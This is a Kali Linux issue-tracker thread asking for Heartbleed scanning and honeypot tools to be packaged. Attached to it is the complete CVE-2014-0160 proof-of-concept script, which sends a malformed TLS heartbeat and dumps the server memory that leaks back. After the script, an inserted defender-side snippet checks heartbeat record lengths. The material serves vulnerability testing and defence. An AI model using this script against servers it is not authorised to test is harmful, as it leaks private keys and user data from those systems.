View Issue Details

ID: 0001147
Project: Kali Linux
Category: New Tool Requests
View Status: public
Last Update: 2020-03-18 17:47
Reporter: Pokeswap
Assigned To:
Priority: normal
Severity: feature
Reproducibility: N/A
Status: closed
Resolution: suspended
Platform: x64
OS: Kali
OS Version: 1.0
Summary: 0001147: heart bleed tools (Heartbleeder, Heartbleed Attack POC and Mass Scanner, Heartbleed Honeypot Script)
Description

Please add heart bleed tools to the Kali repos.
Here are some I have found (as well as a Metasploit module and Nmap NSE script):
Heartbleeder: Tests your servers for OpenSSL: https://github.com/titanous/heartbleeder?files=1
Heartbleed Attack POC and Mass Scanner: https://bitbucket.org/fb1h2s/cve-2014-0160
Heartbleed Honeypot Script: http://packetstormsecurity.com/files/126068/hb_honeypot.pl.txt

Attached Files
2014-0160.py (4,437 bytes)   
#!/usr/bin/python
 
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected])
# The author disclaims copyright to this source code.
 
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
from binascii import unhexlify
 
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
 
def h2bin(x):
    #x=x.encode('ascii', 'strict')
    return unhexlify(x.replace(' ', '').replace('\n', ''))
 
hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01                                  
''')
 
hb = h2bin(''' 
18 03 02 00 03
01 40 00
''')
 
def hexdump(s):
    for b in xrange(0, len(s), 16):
        lin = [c for c in s[b : b + 16]]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
        print ('  %04x: %-48s %s' % (b, hxdat, pdat))
    print
 
def recvall(s, length, timeout=5):
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time() 
        if rtime < 0:
            return None
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata
        
 
def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
        print ('Unexpected EOF receiving record header - server closed connection')
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        print ('Unexpected EOF receiving record payload - server closed connection')
        return None, None, None
    print (' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)))
    return typ, ver, pay
 
def hit_hb(s):
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print ('No heartbeat response received, server likely not vulnerable')
            return False
 
        if typ == 24:
            print ('Received heartbeat response:')
            hexdump(pay)
            if len(pay) > 3:
                print ('WARNING: server returned more data than it should - server is vulnerable!')
            else:
                print ('Server processed malformed heartbeat, but did not return any extra data.')
            return True
 
        if typ == 21:
            print ('Received alert:')
            hexdump(pay)
            print ('Server returned error, likely not vulnerable')
            return False
 
def main():
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return
 
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print ('Connecting...')
    sys.stdout.flush()
    s.connect((args[0], opts.port))
    print ('Sending Client Hello...')
    sys.stdout.flush()
    s.send(hello)
    print ('Waiting for Server Hello...')
    sys.stdout.flush()
    while True:
        typ, ver, pay = recvmsg(s)
        if typ == None:
            print ('Server closed connection without sending Server Hello.')
            return
        # Look for server hello done message.
        if typ == 22 and ord(pay[0]) == 0x0E:
            break
 
    print ('Sending heartbeat request...')
    sys.stdout.flush()
    s.send(hb)
    hit_hb(s)
 
if __name__ == '__main__':
    main()
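Added example, not part of the attached script or of any tool requested here: a defender-side check that walks cleartext TLS records and flags a heartbeat whose claimed payload length cannot fit in its record, which is the property of the `hb` request above (record length 3, payload length 0x4000). It applies the RFC 6520 length rule and assumes unencrypted records; the function names and the well-formed and alert sample records are constructed for illustration.

```python
import struct

HEARTBEAT = 24     # TLS record content type 0x18, the type the script checks for
MIN_PADDING = 16   # RFC 6520 requires at least 16 bytes of padding


def check_heartbeat(body: bytes) -> str:
    """Apply the RFC 6520 length rule to one heartbeat record body."""
    if len(body) < 3:
        return "malformed"            # no room for type + payload_length
    _hb_type, claimed = struct.unpack(">BH", body[:3])
    # type(1) + payload_length(2) + payload + padding must fit in the record
    if 3 + claimed + MIN_PADDING > len(body):
        return "malformed"            # claimed payload exceeds what was sent
    return "ok"


def scan_records(stream: bytes):
    """Walk cleartext TLS records; return (offset, verdict) per heartbeat."""
    findings, off = [], 0
    while off + 5 <= len(stream):
        ctype, _ver, rec_len = struct.unpack(">BHH", stream[off:off + 5])
        body = stream[off + 5:off + 5 + rec_len]
        if len(body) < rec_len:
            findings.append((off, "truncated"))
            break
        if ctype == HEARTBEAT:
            findings.append((off, check_heartbeat(body)))
        off += 5 + rec_len
    return findings


# The request from the attached script: record length 3, claimed payload 0x4000.
PAGE_HB = bytes.fromhex("18 03 02 00 03 01 40 00")
# Constructed well-formed request: 4-byte payload plus 16 bytes of padding.
GOOD_HB = bytes.fromhex("18 03 02 00 17 01 00 04") + b"ping" + bytes(16)
# Constructed non-heartbeat record (alert, type 21) to show it is skipped.
ALERT = bytes.fromhex("15 03 02 00 02 02 28")

if __name__ == "__main__":
    for offset, verdict in scan_records(GOOD_HB + ALERT + PAGE_HB):
        print(f"offset {offset}: heartbeat {verdict}")
```
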

Activities

crossbower

2014-04-13 09:20

reporter   ~0001688

I have sent an email to the creators of Heartbleed Attack POC and Mass Scanner and Heartbleed Honeypot Script, requesting some info about the license of the tools.

For Heartbleeder, it requires a version of the Go language we currently do not support.

I'm waiting for the replies.

glitch

2014-04-14 03:07

reporter   ~0001691

Code has been updated with GPLv3 and version 0.1.1

crossbower

2014-04-27 19:56

reporter   ~0001732

Heartbleed Honeypot Script added

g0tmi1k

2018-01-29 14:59

administrator   ~0008405

To help speed up the process of evaluating the tool, please make sure to include the following information (the more information you include, the more beneficial it will be for us):

  • [Name] - The name of the tool
  • [Version] - What version of the tool should be added?
    --- If it uses source control (such as git), please make sure there is a release to match (e.g. git tag)
  • [Homepage] - Where can the tool be found online? Where to go to get more information?
  • [Download] - Where to go to get the tool?
  • [Author] - Who made the tool?
  • [Licence] - How is the software distributed? What conditions does it come with?
  • [Description] - What is the tool about? What does it do?
  • [Dependencies] - What is needed for the tool to work?
  • [Similar tools] - What other tools are out there?
  • [How to install] - How do you compile it?
  • [How to use] - What are some basic commands/functions to demonstrate it?

g0tmi1k

2018-01-30 10:41

administrator   ~0008576

Wonder if this would be better on exploit-db.com...

g0tmi1k

2020-03-18 17:47

administrator   ~0012452

No response... Closing.

Please reopen if the information can be provided.

Issue History

Date Modified     Username    Field                      Change
2014-04-11 19:31  Pokeswap    New Issue
2014-04-13 09:20  crossbower  Note Added: 0001688
2014-04-13 09:21  crossbower  Assigned To                => crossbower
2014-04-13 09:21  crossbower  Status                     new => feedback
2014-04-14 03:07  glitch      Note Added: 0001691
2014-04-14 10:18  Pokeswap    File Added: 2014-0160.py
2014-04-27 19:56  crossbower  Note Added: 0001732
2014-05-12 17:16  xploitx     Issue cloned: 0001204
2018-01-26 09:57  g0tmi1k     Status                     feedback => new
2018-01-26 09:57  g0tmi1k     Category                   Feature Requests => New Tool Requests
2018-01-29 10:10  g0tmi1k     Assigned To                crossbower =>
2018-01-29 10:10  g0tmi1k     Priority                   high => normal
2018-01-29 10:10  g0tmi1k     Severity                   major => minor
2018-01-29 10:10  g0tmi1k     Summary                    hart bleed tools => heart bleed tools (Heartbleeder, Heartbleed Attack POC and Mass Scanner, Heartbleed Honeypot Script)
2018-01-29 14:59  g0tmi1k     Note Added: 0008405
2018-01-30 10:41  g0tmi1k     Note Added: 0008576
2019-12-09 13:30  g0tmi1k     Severity                   minor => feature
2020-03-18 17:47  g0tmi1k     Status                     new => closed
2020-03-18 17:47  g0tmi1k     Resolution                 open => suspended
2020-03-18 17:47  g0tmi1k     Note Added: 0012452